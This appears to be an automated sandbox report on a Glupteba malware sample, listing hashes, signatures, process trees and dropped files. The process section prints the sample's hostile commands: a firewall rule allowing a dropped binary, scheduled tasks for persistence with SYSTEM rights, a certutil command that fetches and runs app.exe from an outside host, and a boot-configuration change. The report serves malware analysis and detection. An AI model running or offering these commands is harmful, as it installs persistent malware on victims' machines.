Analysis
-
max time kernel
31s -
max time network
160s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
24-05-2022 21:33
Static task
static1
Behavioral task
behavioral1
Sample
60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe
Resource
win7-20220414-en
General
-
Target
60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe
-
Size
3.8MB
-
MD5
79b40e7d866110b9624906e63bf87456
-
SHA1
be098dd1ca4465bf415423f5887508e2198fb078
-
SHA256
60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f
-
SHA512
366e5c896cbbbd0a5a40fee53dc102cac67f5a65dcb0309d5d2501d3487a46edadad034a4765fc7370eec61faeefecd8dfb5f187ad5e1c921a1153438f4a662a
Malware Config
Signatures
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1948-56-0x0000000005500000-0x0000000005BF6000-memory.dmp family_glupteba behavioral1/memory/1948-57-0x0000000000400000-0x00000000036BB000-memory.dmp family_glupteba -
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 524 bcdedit.exe -
Drops file in Windows directory 1 IoCs
Processes:
makecab.exedescription ioc process File created C:\Windows\Logs\CBS\CbsPersist_20220524233513.cab makecab.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 1 IoCs
Processes:
netsh.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exepid process 1948 60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe 1436 60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exedescription pid process Token: SeDebugPrivilege 1948 60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe Token: SeImpersonatePrivilege 1948 60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.execmd.exedescription pid process target process PID 1436 wrote to memory of 1804 1436 60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe cmd.exe PID 1436 wrote to memory of 1804 1436 60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe cmd.exe PID 1436 wrote to memory of 1804 1436 60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe cmd.exe PID 1436 wrote to memory of 1804 1436 60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe cmd.exe PID 1804 wrote to memory of 1688 1804 cmd.exe netsh.exe PID 1804 wrote to memory of 1688 1804 cmd.exe netsh.exe PID 1804 wrote to memory of 1688 1804 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe"C:\Users\Admin\AppData\Local\Temp\60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe"C:\Users\Admin\AppData\Local\Temp\60f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524233513.log C:\Windows\Logs\CBS\CbsPersist_20220524233513.cab1⤵
- Drops file in Windows directory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\d26671056783\d26671056783.exe" enable=yes1⤵
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
C:\Windows\rss\csrss.exeFilesize
3.8MB
MD579b40e7d866110b9624906e63bf87456
SHA1be098dd1ca4465bf415423f5887508e2198fb078
SHA25660f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f
SHA512366e5c896cbbbd0a5a40fee53dc102cac67f5a65dcb0309d5d2501d3487a46edadad034a4765fc7370eec61faeefecd8dfb5f187ad5e1c921a1153438f4a662a
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
\Users\Admin\AppData\Local\Temp\dbghelp.dllFilesize
1.5MB
MD5f0616fa8bc54ece07e3107057f74e4db
SHA1b33995c4f9a004b7d806c4bb36040ee844781fca
SHA2566e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA51215242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
4.4MB
MD51d473b4ac9be66cc80241ea3593eac3e
SHA142d0813b0455af4b3e4688f7e8622edc0546f0a1
SHA25662a5f155a915ab6798502b4960f043692f7cb36f28e1632092b8645e8fe09521
SHA51278880f444870c7b46d3674b4e28236c9214f2d7299bab5866d55c4f7f39675d0c536b56dd152c3f19592c3dfbb4f9d0d7deabc77ff39087ba68928138ae6260a
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
3.4MB
MD585d6302f1f8a4902c590ee6e98024589
SHA18ac4c827bbedfe7e18526541340fb3e48f7c8ac7
SHA2565213efbb7ebc3e633f47ec2417589208c80ebd8640a9ae6ca221e9eac20a3938
SHA51280d6f4c50cfd284e7e7a12391993dde24eeb743ad20a963704d0250279eae1b13031c35b0071d99f62ebde64e3515729128cc0521329145dfa48663f234c1d4f
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
3.9MB
MD52a207fb2d91453155836e328ee8189b5
SHA13f64e1568c8f21d2f500d2c82c4da2cfb41cb165
SHA256288d4c5a8b49e3171848e36e00e79e5aaee4b7bbf1a4b90298e74355e77aee78
SHA512a3b7e2fb14111182e9564cd51e8f8232aa175d93fd88c83a693138b7dde98a41a9014712deb13f12f671e77108ca18aab852a927efb4cef264ee1e559dec90a9
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\symsrv.dllFilesize
163KB
MD55c399d34d8dc01741269ff1f1aca7554
SHA1e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA5128ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
-
\Windows\rss\csrss.exeFilesize
3.8MB
MD579b40e7d866110b9624906e63bf87456
SHA1be098dd1ca4465bf415423f5887508e2198fb078
SHA25660f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f
SHA512366e5c896cbbbd0a5a40fee53dc102cac67f5a65dcb0309d5d2501d3487a46edadad034a4765fc7370eec61faeefecd8dfb5f187ad5e1c921a1153438f4a662a
-
\Windows\rss\csrss.exeFilesize
3.8MB
MD579b40e7d866110b9624906e63bf87456
SHA1be098dd1ca4465bf415423f5887508e2198fb078
SHA25660f28668503e2321f14a4648cd0f06dd8b4854ffea8c4c642a76db763936ac5f
SHA512366e5c896cbbbd0a5a40fee53dc102cac67f5a65dcb0309d5d2501d3487a46edadad034a4765fc7370eec61faeefecd8dfb5f187ad5e1c921a1153438f4a662a
-
memory/392-68-0x0000000004EE0000-0x0000000005287000-memory.dmpFilesize
3.7MB
-
memory/392-64-0x0000000000000000-mapping.dmp
-
memory/392-71-0x0000000004EE0000-0x0000000005287000-memory.dmpFilesize
3.7MB
-
memory/392-72-0x0000000000400000-0x00000000036BB000-memory.dmpFilesize
50.7MB
-
memory/524-84-0x0000000000000000-mapping.dmp
-
memory/1436-58-0x0000000004F10000-0x00000000052B7000-memory.dmpFilesize
3.7MB
-
memory/1436-66-0x0000000004F10000-0x00000000052B7000-memory.dmpFilesize
3.7MB
-
memory/1436-67-0x0000000000400000-0x00000000036BB000-memory.dmpFilesize
50.7MB
-
memory/1688-61-0x000007FEFBF21000-0x000007FEFBF23000-memory.dmpFilesize
8KB
-
memory/1688-60-0x0000000000000000-mapping.dmp
-
memory/1804-59-0x0000000000000000-mapping.dmp
-
memory/1948-54-0x0000000005150000-0x00000000054F7000-memory.dmpFilesize
3.7MB
-
memory/1948-57-0x0000000000400000-0x00000000036BB000-memory.dmpFilesize
50.7MB
-
memory/1948-56-0x0000000005500000-0x0000000005BF6000-memory.dmpFilesize
7.0MB
-
memory/1948-55-0x0000000005150000-0x00000000054F7000-memory.dmpFilesize
3.7MB